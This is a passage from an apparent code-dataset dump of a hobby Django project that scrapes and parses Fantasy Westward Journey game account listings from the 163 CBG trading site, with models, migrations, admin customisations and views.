TransactionManager(IndexManager):\n def get_transaction(self,**kwargs):\n return self.get_queryset_stat().filter(**kwargs).values('id','team',).order_by('-create_time')\n"
},
{
"alpha_fraction": 0.5752449035644531,
"alphanum_fraction": 0.6910062432289124,
"avg_line_length": 36.46666717529297,
"blob_id": "f92bfe1ef9cbd11551b2c5356f22fd754f3fc76b",
"content_id": "5de9c08d36bc4d591b28e60fdc987be5028681f3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1123,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 30,
"path": "/spider/__init__.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "from spider.cbgspider import Spider\nfrom spider.parse import Parse\n\nclass Engine:\n def __init__(self, url):\n self.spider = Spider(url)\n self.parse = Parse(self.spider.json_data)\n\n @property\n def get_parse_result(self):\n return self.parse.start_parse()\n\n @property\n def get_html(self):\n return self.spider.html\n\n @property\n def get_base_data(self):\n return self.spider.base_data\n\n\n\nif __name__ == '__main__':\n # engine = Engine(r'https://xyq.cbg.163.com/equip?s=132&eid=201809032000113-132-DUW7DXJNIWED&view_loc=equip_list')\n # engine = Engine(r'https://xyq.cbg.163.com/equip?s=132&eid=201808302200113-132-YX9SVYZXJIRY&view_loc=equip_list')\n # engine = Engine(r'https://xyq.cbg.163.com/equip?s=482&eid=201809132100113-482-7SCLOBWBBM3W&view_loc=equip_list')\n # engine = Engine(r'https://xyq.cbg.163.com/equip?s=482&eid=201808062200113-482-Y6CGKXZDUSER&view_loc=equip_list')\n engine = Engine(r'https://xyq.cbg.163.com/equip?s=416&eid=201809211700113-416-T22Y7XWOX35C&view_loc=equip_list')\n print(engine.get_parse_result)\n print(engine.get_base_data)"
},
{
"alpha_fraction": 0.6196156144142151,
"alphanum_fraction": 0.6229290962219238,
"avg_line_length": 31.826086044311523,
"blob_id": "d39bad53947341dfda8d2d701ba10d18971aff54",
"content_id": "f8f1628a60daa7d40c15becd494ce34646abe1ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1509,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 46,
"path": "/web/templatetags/filter.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "from django import template\nfrom django.contrib.admin.templatetags.admin_list import result_headers, result_hidden_fields, results\nfrom django.template.defaultfilters import stringfilter\nfrom django.utils.safestring import mark_safe\n\nregister = template.Library()\n\n\[email protected](name='to_url')\n@stringfilter\ndef to_url(value):\n return value + '/'\n\n\[email protected]_tag(\"base/my_chang_list.html\")\ndef my_result_list(cl):\n headers = list(result_headers(cl))\n num_sorted_fields = 0\n for h in headers:\n if h['sortable'] and h['sorted']:\n num_sorted_fields += 1\n\n rl = list(results(cl))\n for i in range(len(rl)):\n for j in range(1,len(rl[i])):\n rl[i][j] = mark_safe(rl[i][j].replace(\n '<a ','<a class=\"btn-link\" ').replace(\n '<th class=\"','<th style=\"vertical-align:middle\" class=\"text-center ').replace(\n '<td class=\"','<td style=\"vertical-align:middle\" class=\"')\n )\n\n return {'cl': cl,\n 'result_hidden_fields': list(result_hidden_fields(cl)),\n 'result_headers': headers,\n 'num_sorted_fields': num_sorted_fields,\n 'results': rl,}\n\n\[email protected]_tag('base/my_actions.html', takes_context=True)\ndef my_admin_actions(context):\n \"\"\"\n Track the number of times the action field has been rendered on the page,\n so we know which value to use.\n \"\"\"\n context['action_index'] = context.get('action_index', -1) + 1\n return context"
},
{
"alpha_fraction": 0.5132924318313599,
"alphanum_fraction": 0.5531697273254395,
"avg_line_length": 33.92856979370117,
"blob_id": "9c926ea68099ddfdfc9b3764b84bb75c1a7e8092",
"content_id": "977ffc8a841d9b37de49e092a11d44d5899e7ab5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 994,
"license_type": "no_license",
"max_line_length": 139,
"num_lines": 28,
"path": "/dbmodels/migrations/0011_menu.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.0.6 on 2018-09-18 04:47\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dbmodels', '0010_auto_20180918_0842'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Menu',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=10)),\n ('url', models.CharField(blank=True, max_length=100, null=True)),\n ('stat', models.IntegerField(choices=[(0, '下架'), (1, '上架')], default=1)),\n ('parent_menu', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='dbmodels.Menu')),\n ],\n options={\n 'verbose_name': '菜单',\n 'verbose_name_plural': '菜单',\n },\n ),\n ]\n"
},
{
"alpha_fraction": 0.5025773048400879,
"alphanum_fraction": 0.5876288414001465,
"avg_line_length": 20.55555534362793,
"blob_id": "6b1b4118b5fda196e891cf2b0cd6ac9807380b36",
"content_id": "f8fb35cd40ad45fe633a36944775844fe22a0dfd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 388,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 18,
"path": "/dbmodels/migrations/0009_auto_20180918_0835.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.0.6 on 2018-09-18 00:35\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dbmodels', '0008_auto_20180918_0816'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='rightnav',\n name='title',\n field=models.CharField(max_length=10),\n ),\n ]\n"
},
{
"alpha_fraction": 0.4783625602722168,
"alphanum_fraction": 0.5274853706359863,
"avg_line_length": 31.884614944458008,
"blob_id": "0a67e8b88067396b7fe624c5b06747f41f58a2af",
"content_id": "3e16c49fdcc32605c39b16165a2f479b0c8d5906",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 911,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 26,
"path": "/dbmodels/migrations/0008_auto_20180918_0816.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.0.6 on 2018-09-18 00:16\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dbmodels', '0007_auto_20180917_2236'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='RightNav',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.IntegerField(choices=[(0, '梦幻论坛'), (1, '梦幻工具'), (2, '五开概览'), (3, '梦幻金价'), (4, '梦幻其他')])),\n ('stat', models.IntegerField(choices=[(0, '下架'), (1, '上架')], default=1)),\n ],\n ),\n migrations.AddField(\n model_name='transaction',\n name='stat',\n field=models.IntegerField(choices=[(0, '售出'), (1, '上架')], default=1),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6024680733680725,
"alphanum_fraction": 0.6055530905723572,
"avg_line_length": 26.658536911010742,
"blob_id": "349bbb509cd7fe7c9523469bfb96ec2853d4df2f",
"content_id": "8d06536a323882ea7beb75e89df5f73163d60c61",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2277,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 82,
"path": "/web/views.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render, redirect,HttpResponse\nfrom django.views import View\n\nfrom dbmodels.models import ShowImg, RightNav, Menu, Transaction\nfrom django.contrib.auth import authenticate, login as lgi, logout as lgt\nimport functools\n\n# Create your views here.\ndef index(request):\n # 返回图片\n\n slider = ShowImg.objects.get_slider()\n right_nav = RightNav.objects.get_title()\n if request.session.get('menu') is None:\n menu = Menu.objects.get_menu()\n request.session['menu'] = menu\n\n return render(request, 'index.html', {'slider': slider,\n 'right_nav': right_nav,\n })\n\n\ndef login(request):\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n rember = request.POST.get('rember')\n\n user = authenticate(request, username=username, password=password)\n if user is not None:\n lgi(request, user)\n if not rember:\n request.session.set_expiry(0)\n return redirect('web:index')\n\n return render(request, 'login.html')\n\n\ndef logout(request):\n lgt(request)\n return redirect('web:login')\n\ndef transaction_deal(func):\n @functools.wraps(func)\n def warp(*args,**kwargs):\n new_kwargs = {}\n for i,j in kwargs.items():\n if j:\n new_kwargs[i] = int(j[:-1])\n\n args = args + (1,) if new_kwargs.get('pk') else args + (0,)\n\n result = func(*args,**new_kwargs)\n return result\n return warp\n\n\n@transaction_deal\ndef transaction(request,*args,**kwargs):\n if request.method == 'GET' and not args[-1]:\n result_list = Transaction.objects.get_transaction(**kwargs)\n return render(request, 'list.html', {\n 'result_list': result_list,\n })\n else:\n pass\n\n\n\n\ndef user(request):\n # data = Transaction.objects.all()\n\n from django.http import JsonResponse\n # from django.core import serializers\n #\n # data1 = serializers.serialize('json',data)\n # print(data1)\n # print(Transaction.objects.values())\n result = JsonResponse(list(Transaction.objects.values()),safe=False)\n print(result)\n return result\n\n"
},
{
"alpha_fraction": 0.5735849142074585,
"alphanum_fraction": 0.6339622735977173,
"avg_line_length": 25.5,
"blob_id": "5dafb938f560efebad70a1178b18571599a71d3e",
"content_id": "9aba4e0085bda55a1c5b6bdcb1c607b7210c9887",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 530,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 20,
"path": "/dbmodels/migrations/0014_rolebase_transaction.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.0.6 on 2018-09-20 04:29\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dbmodels', '0013_auto_20180920_1221'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='rolebase',\n name='transaction',\n field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='dbmodels.Transaction'),\n preserve_default=False,\n ),\n ]\n"
},
{
"alpha_fraction": 0.5959905982017517,
"alphanum_fraction": 0.5969111323356628,
"avg_line_length": 29.08307647705078,
"blob_id": "dc6ec7600863332cc306cdcbb96719706f08608b",
"content_id": "cdc57de890d24da6b99ece9c61b991d9d7c4b726",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9839,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 325,
"path": "/web/sites.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "from collections import OrderedDict\n\nfrom django.contrib.admin import ModelAdmin\nfrom django.contrib.admin.sites import AlreadyRegistered, AdminSite\nfrom django.contrib.admin.templatetags.admin_list import _coerce_field_name\nfrom django.contrib.admin.utils import label_for_field, quote\nfrom django.core.exceptions import FieldDoesNotExist\nfrom django.db.models.expressions import OrderBy, F\nfrom django.utils.http import urlencode\nfrom django.utils.safestring import mark_safe\nfrom django.views.decorators.cache import never_cache\nfrom django.shortcuts import render, redirect, reverse\nfrom django.contrib.auth import authenticate, login as lgi, logout as lgt\nfrom django.views.generic import View, ListView, DetailView, CreateView, UpdateView, DeleteView\nimport importlib\nfrom dbmodels.models import ShowImg, RightNav, Menu, Transaction\nfrom django.utils.html import format_html\n\n\n\n\n\n\nclass MyModelAdmin(ModelAdmin):\n list_template_name = \"list.html\"\n detail_template_name = \"detail.html\"\n create_template_name = \"create.html\"\n update_template_name = \"create.html\"\n delete_template_name = None\n\n\n\n def get_urls(self):\n from django.urls import path\n\n info = self.opts.model_name\n\n urlpatterns = [\n path('', self.changelist_view, name='%s_changelist' % info),\n path('add/', self.add_view, name='%s_add' % info),\n path('<path:object_id>/delete/', self.delete_view, name='%s_delete' % info),\n path('<path:object_id>/change/', self.change_view, name='%s_change' % info),\n path('<path:object_id>/detail/', self.detail_view, name='%s_detail' % info),\n ]\n return urlpatterns\n\n @property\n def urls(self):\n return self.get_urls()\n\n def _get_view_cls(self, method, extra_pro=None):\n cls_name = '%s%sView' % (self.opts.model_name, method)\n\n module = importlib.import_module('django.views.generic')\n father_cls = getattr(module, '%sView' % method.capitalize())\n\n cls_pro = {\n 'template_name': getattr(self, '%s_template_name' % method),\n 'model': self.model,\n }\n cls_pro.update(extra_pro or {})\n\n cls = type(cls_name, (father_cls,), cls_pro)\n return cls\n\n def _has_extra_pro_method(self, method,extra_context = None):\n '''返回额外的类属性和方法'''\n m = '%s_extra_pro' % method\n extra_context = extra_context or {}\n if hasattr(self, m):\n d = getattr(self, m)()\n d.update({'extra_context':extra_context})\n return d\n\n def changelist_view(self, request,extra_context=None):\n template_response = super(MyModelAdmin,self).changelist_view(request,extra_context)\n\n cl = template_response.context_data['cl']\n def url_for_result(cl, result):\n pk = getattr(result, cl.pk_attname)\n return reverse('web:%s_change' % cl.opts.model_name,\n args=(quote(pk),),\n current_app=cl.model_admin.admin_site.name)\n\n from functools import partial\n cl.url_for_result = partial(url_for_result,cl)\n\n method = 'list'\n\n extra_pro = self._has_extra_pro_method(method,template_response.context_data)\n\n cls = self._get_view_cls(method, extra_pro)\n\n return cls.as_view()(request)\n\n def add_view(self, request, form_url='', extra_context=None):\n method = 'create'\n\n extra_pro = self._has_extra_pro_method(method)\n\n cls = self._get_view_cls(method, extra_pro)\n\n return cls.as_view()(request)\n\n def change_view(self, request, object_id,form_url='', extra_context=None ):\n method = 'update'\n\n kwargs = {'pk': object_id}\n\n extra_pro = self._has_extra_pro_method(method)\n\n cls = self._get_view_cls(method, extra_pro)\n return cls.as_view()(request, **kwargs)\n\n def delete_view(self, 
request, object_id, extra_context=None):\n method = 'delete'\n\n kwargs = {'pk': object_id}\n\n extra_pro = self._has_extra_pro_method(method)\n\n cls = self._get_view_cls(method, extra_pro)\n return cls.as_view()(request, **kwargs)\n\n def detail_view(self, request, object_id, ):\n method = 'detail'\n\n kwargs = {'pk': object_id}\n\n extra_pro = self._has_extra_pro_method(method)\n\n cls = self._get_view_cls(method, extra_pro)\n return cls.as_view()(request, **kwargs)\n\n\n\n\n\nclass WebSite(AdminSite):\n\n def get_urls(self):\n from django.urls import include, path\n\n urlpatterns = [\n path('', self.index, name='index'),\n path('login/', self.login, name='login'),\n path('logout/', self.logout, name='logout'),\n path('jsi18n/', self.i18n_javascript, name='jsi18n'),\n ]\n\n for model, model_admin in self._registry.items():\n urlpatterns += [\n path('%s/' % (model._meta.model_name), include(model_admin.urls)),\n ]\n\n return urlpatterns\n\n @property\n def urls(self):\n return self.get_urls(), 'web', self.name\n\n @never_cache\n def index(self, request, extra_context=None):\n\n slider = ShowImg.objects.get_slider()\n right_nav = RightNav.objects.get_title()\n if request.session.get('menu') is None:\n menu = Menu.objects.get_menu()\n request.session['menu'] = menu\n\n context = {'slider': slider,\n 'right_nav': right_nav}\n\n context.update(extra_context or {})\n\n return render(request, 'index.html', context)\n\n @never_cache\n def logout(self, request):\n lgt(request)\n return redirect('web:login')\n\n @never_cache\n def login(self, request,):\n return LoginView.as_view()(request)\n\n\nclass LoginView(View):\n def valid_user(self, request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n return user\n\n def post(self, request, *args, **kwargs):\n user = self.valid_user(request)\n if user is not None:\n lgi(request, user)\n rember = request.POST.get('rember')\n if not rember:\n request.session.set_expiry(0)\n return redirect('web:index')\n self.get(request, *args, **kwargs)\n\n def get(self, request, *args, **kwargs):\n return render(request, 'login.html')\n\n\nclass ChangeListView(ListView):\n template_name = \"list.html\"\n model = Transaction\n ordering = ('-create_time')\n context_object_name = 'result_list'\n\n\nclass WebDetailView(DetailView):\n template_name = \"detail.html\"\n model = Transaction\n\n\nclass AddView(CreateView):\n template_name = \"create.html\"\n model = Transaction\n fields = '__all__'\n\n # success_url = reverse\n def get_success_url(self):\n return reverse('web:transaction_changelist')\n\n extra_context = None\n def get_context_data(self):\n pass\n\n\nclass WebUpdateView(UpdateView):\n template_name = \"create.html\"\n model = Transaction\n fields = '__all__'\n\n def get_success_url(self):\n return reverse('web:transaction_changelist')\n\n\nclass WebDeleteView(DeleteView):\n model = Transaction\n\n def get(self, request, *args, **kwargs):\n return self.post(request, *args, **kwargs)\n\n def get_success_url(self):\n return reverse('web:transaction_changelist')\n\n\nclass TModelAdmin(MyModelAdmin):\n list_display = ('__str__', 'team', 'img', 'stat', 'user','get_btn')\n list_editable = ('team', 'img', 'stat', 'user',)\n\n def get_btn(self,obj):\n s = ''' <a href=\"{}\" class=\"btn-link\">\n <span class=\"label label-info\">查看</span>\n </a>\n <a href=\"{}\" class=\"btn-link\">\n <span class=\"label label-success\">修改</span>\n </a>\n <a href=\"{}\" 
class=\"btn-link\">\n <span class=\"label label-warning\">删除</span>\n </a>'''\n return format_html(\n s,\n reverse('web:transaction_detail',args=(obj.pk,)),\n reverse('web:transaction_change',args=(obj.pk,)),\n reverse('web:transaction_delete',args=(obj.pk,)),\n\n )\n get_btn.short_description = '操作'\n\n def list_extra_pro(self):\n return {# 'context_object_name': 'result_list',\n #'extra_context': self.get_list_extra_context,\n }\n\n def create_extra_pro(self):\n return {'get_success_url': self.get_success_url,\n 'fields': '__all__',\n 'extra_context':self.get_create_extra_context,\n }\n\n def update_extra_pro(self):\n return {'get_success_url': self.get_success_url,\n 'fields': '__all__',}\n\n def delete_extra_pro(self):\n return {'get_success_url': self.get_success_url,\n 'get': self.get}\n\n @staticmethod\n def get_success_url(self):\n return reverse('web:transaction_changelist')\n\n @staticmethod\n def get(self, request, *args, **kwargs):\n return getattr(self, 'post')(request, *args, **kwargs)\n\n @property\n def get_uptdate_fields(self):\n fields = '__all__'\n return fields\n\n @property\n def get_create_fields(self):\n fields = '__all__'\n return fields\n\n @property\n def get_create_extra_context(self):\n '''add_view 展示的页面的context'''\n return {'s1':'5'}\n\n # @property\n # def get_list_extra_context(self):\n # '''add_view 展示的页面的context'''\n # from django.contrib.admin.templatetags import admin_list\n # return {'result_list_ccc':admin_list.result_list(self.cl)}\nsite = WebSite(name='web')\nsite.register(Transaction, TModelAdmin)\n"
},
{
"alpha_fraction": 0.5183374285697937,
"alphanum_fraction": 0.5990220308303833,
"avg_line_length": 21.72222137451172,
"blob_id": "cb9c51f003f8010229e10778e93c3a31bb9c62ac",
"content_id": "051043121ed29c3cd9d3b43557f54810e658e101",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 409,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 18,
"path": "/dbmodels/migrations/0004_auto_20180917_1931.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.0.6 on 2018-09-17 11:31\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dbmodels', '0003_auto_20180917_1906'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='userinfo',\n name='login_account',\n field=models.CharField(max_length=64, unique=True),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5303429961204529,
"alphanum_fraction": 0.5546174049377441,
"avg_line_length": 31.672412872314453,
"blob_id": "a48bf2da9cb97a3423d72fcf6f75a91d30704596",
"content_id": "c38dbe456d176808eac4a7ec9d64e95df5024c31",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1947,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 58,
"path": "/dbmodels/migrations/0007_auto_20180917_2236.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.0.6 on 2018-09-17 14:36\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dbmodels', '0006_auto_20180917_1952'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='showimg',\n options={'verbose_name': '首页图片', 'verbose_name_plural': '首页图片'},\n ),\n migrations.AlterModelOptions(\n name='transaction',\n options={'verbose_name': '交易帖子', 'verbose_name_plural': '交易帖子'},\n ),\n migrations.RemoveField(\n model_name='showimg',\n name='create_time',\n ),\n migrations.RemoveField(\n model_name='showimg',\n name='img',\n ),\n migrations.AddField(\n model_name='showimg',\n name='transcation',\n field=models.OneToOneField(default=20180917, on_delete=django.db.models.deletion.CASCADE, to='dbmodels.Transaction'),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='transaction',\n name='create_time',\n field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='transaction',\n name='img',\n field=models.ImageField(blank=True, null=True, upload_to='indeximg'),\n ),\n migrations.AlterField(\n model_name='showimg',\n name='img_type',\n field=models.IntegerField(choices=[(0, '轮播'), (1, '最热'), (2, '最新')], default=3),\n ),\n migrations.AlterField(\n model_name='showimg',\n name='stat',\n field=models.IntegerField(choices=[(0, '下架'), (1, '上架')], default=1),\n ),\n ]\n"
},
{
"alpha_fraction": 0.7333333492279053,
"alphanum_fraction": 0.7333333492279053,
"avg_line_length": 25,
"blob_id": "369f9a054b6a04bbb2f82d151ba4f053c6c79242",
"content_id": "5f70cb1a0d02e2af05c6d6f856fca64b43d26ef0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 495,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 19,
"path": "/backend/admin.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\n# Register your models here.\nfrom django.contrib.admin import ModelAdmin\n\nfrom dbmodels import models\n\n\nclass Tran(ModelAdmin):\n list_display = ('__str__','team','img','stat','user')\n list_editable = ('team','img','stat','user',)\n ordering = ['-team',]\nfrom django.db.models.options import Options\n\n\nadmin.site.register(models.ShowImg)\nadmin.site.register(models.Transaction,Tran)\nadmin.site.register(models.RightNav)\nadmin.site.register(models.Menu)\n\n"
},
{
"alpha_fraction": 0.48191991448402405,
"alphanum_fraction": 0.4873300790786743,
"avg_line_length": 32.423492431640625,
"blob_id": "e5acaaddbab055153f2f3968f88b667daf4dd238",
"content_id": "d261a4c23c7eef5f8d9041e424425e1e9da4750e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22298,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 647,
"path": "/spider/parse.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "\nfrom spider import setting\n\nclass Parse:\n def __init__(self, json_data):\n self.json_data = json_data\n self.ResUrl = 'https://cbg-xyq.res.netease.com'\n\n def _get_role_icon(self, icon):\n if icon > 200:\n kindid = ((icon - 200 - 1) % 12 + 1) + 200\n else:\n kindid = ((icon - 1) % 12 + 1)\n return kindid\n\n def _get_role_fly_status(self, i3FlyLv, iZhuanZhi):\n fly_status = \"\"\n if i3FlyLv and i3FlyLv > 0:\n fly_status = \"化圣\" + setting.CHINESE_NUM_CONFIG[i3FlyLv]\n else:\n if iZhuanZhi >= 0:\n fly_status = setting.ROLE_ZHUAN_ZHI_CONFIG[iZhuanZhi]\n return fly_status\n\n def _get_role_changesch(self, changesch_data):\n if changesch_data:\n changesch = ','.join([setting.SchoolNameInfo[i]\n for i in changesch_data])\n else:\n changesch = \"无\"\n return changesch\n\n def _get_role_proKept(self, _prokept, iGrade):\n\n def parse_single_prop_kept(prop, grade):\n # _this = this;\n attr_list = []\n for key in prop:\n if setting.PROP_KEPT_KEYS[key] and prop[key] >= (grade * 2 + 10):\n attr_list.append({\n 'key': key,\n 'value': prop[key],\n 'name': setting.PROP_KEPT_KEYS[key]\n })\n if len(attr_list) < 1:\n return None\n if len(attr_list) < 2:\n return attr_list[0]['name']\n attr_list.sort(key=lambda x: x['value'] or -setting.PROP_KEPT_KEYS_ORDER.index(x['key']))\n\n return attr_list[0]['name'][0:1] + attr_list[1]['name'][0:1]\n\n res = []\n if _prokept:\n for i in range(len(_prokept)):\n s = parse_single_prop_kept(_prokept[str(i)], iGrade)\n s and res.append(s)\n propKept = ','.join(res) if len(res) > 0 else '无'\n return propKept\n\n def _get_role_community_info(self, commu_name, commu_gid):\n if commu_name and commu_gid:\n community_info = str(commu_name) + \":\" + str(commu_gid)\n else:\n community_info = \"无\"\n return community_info\n\n def parse_role(self):\n '''\n 解析角色\n :return:角色字典\n '''\n json_data = self.json_data\n role = {}\n role['iGrade'] = json_data['iGrade']\n role['cName'] = json_data['cName']\n\n # 角色\n kindid = self._get_role_icon(json_data['iIcon'])\n role['roleKindName'] = setting.RoleKindNameInfo[kindid]\n # 人气\n role['iPride'] = json_data['iPride']\n # 帮派\n role['cOrg'] = json_data['cOrg']\n # 帮贡\n role['iOrgOffer'] = json_data['iOrgOffer']\n # 门派\n role['iSchool'] = setting.SchoolNameInfo[json_data['iSchool']]\n # 门贡\n role['iSchOffer'] = json_data['iSchOffer']\n # 气血\n role['iHp_Max'] = json_data['iHp_Max']\n # 体质\n role['iCor_All'] = json_data['iCor_All']\n # 魔法\n role['iMp_Max'] = json_data['iMp_Max']\n # 魔力\n role['iMag_All'] = json_data['iMag_All']\n # 命中\n role['iAtt_All'] = json_data['iAtt_All']\n # 力量\n role['iStr_All'] = json_data['iStr_All']\n # 伤害\n role['iDamage_All'] = json_data['iDamage_All']\n # 耐力\n role['iRes_All'] = json_data['iRes_All']\n # 防御\n role['iDef_All'] = json_data['iDef_All']\n # 敏捷\n role['iSpe_All'] = json_data['iSpe_All']\n # 速度\n role['iDex_All'] = json_data['iDex_All']\n # 潜力\n role['iPoint'] = json_data['iPoint']\n # 法伤\n role['iTotalMagDam_all'] = json_data['iTotalMagDam_all']\n # 法防\n role['iTotalMagDef_all'] = json_data['iTotalMagDef_all']\n # 获得经验\n role['iUpExp'] = json_data['iUpExp']\n # 已用潜能果数量\n role['iNutsNum'] = json_data['iNutsNum']\n # 新版乾元丹数量\n role['TA_iAllNewPoint'] = json_data['TA_iAllNewPoint']\n # 总经验\n role['sum_exp'] = json_data['sum_exp']\n # 月饼粽子食用量\n role['addPoint'] = json_data['addPoint']\n # 原始种族\n role['ori_race'] = json_data['ori_race']\n # 已获得机缘属性\n role['jiyuan'] = json_data['jiyuan']\n # 飞升/渡劫/化圣\n fly_status = self._get_role_fly_status(json_data['i3FlyLv'],\n json_data['iZhuanZhi'])\n 
role['fly_status'] = fly_status\n # 历史门派\n changesch = self._get_role_changesch(json_data['changesch'])\n role['changesch'] = changesch\n\n # 属性保存方案\n propKept = self._get_role_proKept(json_data['propKept'], json_data['iGrade'])\n role['propKept'] = propKept\n # 攻击修炼\n role['iExptSki1'] = json_data['iExptSki1']\n # 防御修炼\n role['iExptSki2'] = json_data['iExptSki2']\n # 法术修炼\n role['iExptSki3'] = json_data['iExptSki3']\n # 抗法修炼\n role['iExptSki4'] = json_data['iExptSki4']\n # 猎术修炼\n role['iExptSki5'] = json_data['iExptSki5']\n # 育兽术\n role['yu_shou_shu'] = json_data[\"all_skills\"].get(\"221\", 0)\n # 攻击控制力\n role['iBeastSki1'] = json_data['iBeastSki1']\n # 防御控制力\n role['iBeastSki2'] = json_data['iBeastSki2']\n # 法术控制力\n role['iBeastSki3'] = json_data['iBeastSki3']\n # 抗法控制力\n role['iBeastSki4'] = json_data['iBeastSki4']\n # 房屋\n role['fangwu'] = setting.fangwu_info[json_data['rent_level']]\n # 牧场\n role['muchang'] = setting.muchang_info[json_data['farm_level']]\n # 庭院\n role['tingyuan'] = setting.tingyuan_info[json_data['outdoor_level']]\n # 社区\n community_info = self._get_role_community_info(json_data[\"commu_name\"], json_data[\"commu_gid\"])\n role['shequ'] = community_info\n # 比武积分\n role['HeroScore'] = json_data['HeroScore']\n # 剑会积分\n role['sword_score'] = json_data['sword_score']\n # 三界功绩\n role['datang_feat'] = json_data['datang_feat']\n\n return role\n\n def _make_img_name(self, img_name):\n img_id = int(img_name)\n addon = \"\"\n if img_id < 10:\n addon = \"000\"\n elif img_id >= 10 and img_id < 100:\n addon = \"00\"\n elif img_id >= 100 and img_id < 1000:\n addon = \"0\"\n\n return addon + str(img_name)\n\n def _get_skill_icon(self, typeid):\n return self.ResUrl + \"/images/role_skills/\" + self._make_img_name(typeid) + \".gif\"\n\n def parse_skill(self):\n '''\n 解析角色技能\n :return: 角色技能字典\n '''\n json_data = self.json_data\n all_skills = {}\n life_skill = []\n school_skill = []\n ju_qing_skill = []\n\n raw_skill_info = json_data[\"all_skills\"]\n for _skill in raw_skill_info:\n info = {\n \"skill_id\": _skill,\n \"skill_grade\": raw_skill_info[_skill],\n \"skill_pos\": 0\n }\n info[\"skill_icon\"] = self._get_skill_icon(_skill)\n\n if setting.skill[\"life_skill\"].get(_skill):\n info[\"skill_name\"] = setting.skill[\"life_skill\"][_skill]\n life_skill.append(info)\n elif setting.skill[\"school_skill\"].get(_skill):\n info[\"skill_name\"] = setting.skill[\"school_skill\"][_skill][\"name\"]\n info[\"skill_pos\"] = setting.skill[\"school_skill\"][_skill][\"pos\"]\n school_skill.append(info)\n elif setting.skill[\"ju_qing_skill\"].get(_skill):\n info[\"skill_name\"] = setting.skill[\"ju_qing_skill\"][_skill]\n ju_qing_skill.append(info)\n\n all_skills['life_skill'] = life_skill\n all_skills['school_skill'] = school_skill\n all_skills['ju_qing_skill'] = ju_qing_skill\n return all_skills\n\n def _get_equip_info(self, typeid):\n info = setting.equip_info.get(int(typeid))\n result = {\n \"name\": \"\",\n \"desc\": \"\"\n }\n if info:\n result[\"name\"] = info[\"name\"]\n 